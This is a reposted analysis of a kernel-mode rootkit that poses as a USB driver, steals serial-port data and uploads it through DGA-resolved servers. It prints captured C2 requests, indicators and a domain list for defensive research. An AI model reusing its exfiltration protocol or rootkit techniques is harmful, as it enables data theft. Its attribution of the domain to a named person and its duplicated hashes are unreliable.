Came accross an awesome investigation from Artem here: http://artemonsecurity.blogspot.de/2012/07/investigation-interesting-kernel-mode.html
Mirror:
About two weeks ago my friend R136a1 from kernelmode forum came across with dropper that installs driver in the system. We decide make research of them, and it was not a mistake of starting it analyse…
Initial dropper hash:
SHA1: a53d0ef7b3a9f81b133c36af60d2b6acd0f82b74
MD5: 9c0744b8119df63371b83724bafe2095
File size: 32768 bytes
On this moment can tell exactly that only one or two vendors identified it with malware family.
Main purpose of dropper – extract driver from itself and install it in the system.
Driver masked as USB-driver and always extracted with same name – usbhc.sys.
Hash:
SHA1: a53d0ef7b3a9f81b133c36af60d2b6acd0f82b74
MD5: 9c0744b8119df63371b83724bafe2095
File size: 32768 bytes
One of the most strange thing that I discovered – driver is a fully standalone and not receives commands from user mode. And of course, it not create device object and symbolic link. for user mode interaction.
Research led me to a conclusion that driver has one main purpose – stealing data from devices that connect to serial ports of computer and sending it to remote server…
For stealing data from these devices it performs preparatory operations.
First, it reads the contents of \REGISTRY\MACHINE\HardWare\DeviceMap\SERIALCOMM that stores devices attached to serial ports [devices representing serial ports].
Second, it performs attaching to all this devices.
After rootkit attached it device, device stack of serial has view:
Second very interesting thing in this case that all network-based communication with remote server also found in driver:
– DGA (Domain Generation Algorithm)
– DNS via UDP (for convert domain names into IP)
– HTTP-based communication via TCP
– Special communication with ndisrd.sys driver.
For retrieving domains and resolve it to IP-addresses, driver uses such technique. First, it looking for DhcpNameServer parameter for each interface that it found at
\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
On next step, it generates domains and calls DNS-service for response about it status.
All further communication will be done through this server (which was received via DNS). In the end of post listed all domains that it polls.
Network communication completely based on TDI (Transport Device Interface) [look WDK for it description or this tutorial http://www.codeproject.com/Articles/9974/Driver-Development-Part-5-Introduction-to-the-Tran]
Preparing the server connection has the form (in SDK term – creating socket).
Next it will connect to remote server:
Internally in driver, socket described by this structure:
struct TDI_CONNECTION_INTERNAL
{
PFILE_OBJECT foTransportAddress;
HANDLE hTransportAddress;
PVOID foConnection;
HANDLE hConnection;
….
}
After connection with server was set, it can send requests to it via HTTP. Requests have view:
GET /srv.php?&id=uniqueID&mark=METKA&special_marker_opt HTTP/1.1
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: host
Connection: close
Simple communication with server has view (rollcall):
->
GET /srv.php?&id=GOG73FRHOBFI&mark=METKA HTTP/1.1
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: perwadav.org
Connection: close
<-
HTTP/1.1 200 OK..Date: Mon, 23 Jul 2012 17:13:16 GMT
Server: Apache/2.2.3 (CentOS)..X-Powered-By: PHP/5.1.6
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8
SERVERISOK -> server status
After connection was established, driver performs downloads a dropper of ndisrd.sys from server, with request:
GET /srv.php?&id=uniqueID&mark=METKA&f=os_ver HTTP/1.1
Variable of os_ver has view n_xp_32 or n_7_32
Basic requests formed with func:
Conversation:
Driver perform saving dropper into:
\SystemRoot\System32\kb_random.exe
In my case:
Downloaded dropper:
SHA1: 911c027e5f4acf4a75d0cf8e751d0ba8fbbd0959
MD5: a93b5454f4492a4a8d971811f2d12b1e
File size: 81805 bytes
After dropper was downloaded, it will be installed by driver. Installation performs in context of trusted process – explorer or services (in depend of OS version).
Purpose of downloaded dropper – installation of ndisrd.sys driver.
Rootkit driver performs opening device of ndisrd.
Purpose of IOCTLs that rootkit sends to NDISRD could not identified, but there is a list of them:
830020D0
830020D4
830020D8
830020DC
830020C4
As I said before main purpose of rootkit – stealing data from serial devices and sending it to server. Stealing of data performed with registering of completion routine in Write and Read – IRP-dispatch functions. Driver registers the device in the chain of serial-devices, and can see all requests that pass through the chain.
IRP_MJ_READ handler – registers completion routine and calls next on the stack.
Completion routine has view:
After data was captured, wakes up a special thread, which writes cached data to a file.
Thread writes data to file – \SystemRoot\System32\svlog.log.
After data was written, thread sets a special event which signaling that data was written to file.
Thread that response for sending data from file to server:
->
GET /srv.php?&id=GOG73FRHOBFI&mark=METKA&a= HTTP/1.1
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: perwadav.org
Connection: close
Data of file
Data of file
<-
HTTP/1.1 200 OK..Date: Mon, 23 Jul 2012 17:13:16 GMT
Server: Apache/2.2.3 (CentOS)..X-Powered-By: PHP/5.1.6
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8
SERVERISOK -> server status
Information about malicious domain:
This guy linkedin profile http://www.linkedin.com/in/petrachkov.
You can download paper about dropper by R136a1 here http://www.sendspace.com/file/pc5zn0
List of domains:
oqdxvvbk.com
perwadav.org
ebcgndvj.org
qdrhandp.org
tbkfopaf.org
twmhimdj.org
thgdabbj.com
efjwirmb.org
qxkomgei.com
bbfsyfsr.com
jbpgfqra.org
anwfejhx.com
frstfnuh.org
xbcfgule.com
cyfohwwf.com
catjdhuu.org
woyhiepx.org
fmegpykr.com
bowgtptk.com
dnrdyute.org
jchgbmmo.org
poxldxhv.org
mkrhwons.org
aovinvsi.org
ivogeuom.com
mubrnyxd.org
emhedcxc.org
ibqanwif.org
umspakwh.org
wianbpdb.com
oejkewmq.org
gqnjmmgd.org
lpdbwrfu.com
kwkdraat.org
dfogsbau.org
gjfxavjw.org
idrlbacl.org
xavostmi.org
sxdhddbb.com
wbqwvapj.org
jiqcsvng.com
gkceusvc.com
vssqfbmq.org
pcawxcwp.com
lpjnerpe.org
safcoyho.com
llbeoaix.com
oirhxgpf.org
ygdmlsgl.org
fyxfattr.com
tdcqhkne.com
wwdstess.org
eexeufwo.org
wbwfjosa.org
ixskfbvp.org
fmcspasm.org
wdjjkmwv.com
svpaidvo.org
vnhcftma.org
twjotfct.org
fwlckqdv.org
bjfgwabb.com
cdobjfic.org
qjfhsiua.org
enldxohy.com
dcnpyqlg.org
nsbjdfyq.org
cyhwpiaw.org
mnbpwbjj.org
volgbbox.org
tgrwfjpv.com
lgqxwrkf.org
xwalgbjg.com
yuwbhxeu.com
hulosvof.org
qxpvprdy.com
ijjxoocp.org
fbrebqna.com
tpxirylu.com
keukrpqf.org
rxyjkcwj.org
oucmtrhv.com
rxftpvku.com
wlxrrqyd.org
ybljdhos.org
qwkpxcct.org
qecgrdxg.org
dudfymdl.org
sesjvgii.com
yxcxjriu.org
ljmiphjx.org
btotkygq.org
fodbotqn.org
rfsojypy.com
mbdoebhh.org
johqyxsw.org
gldfgkey.com
fvpujviq.org
fyclctjf.org
xnvwdmyf.org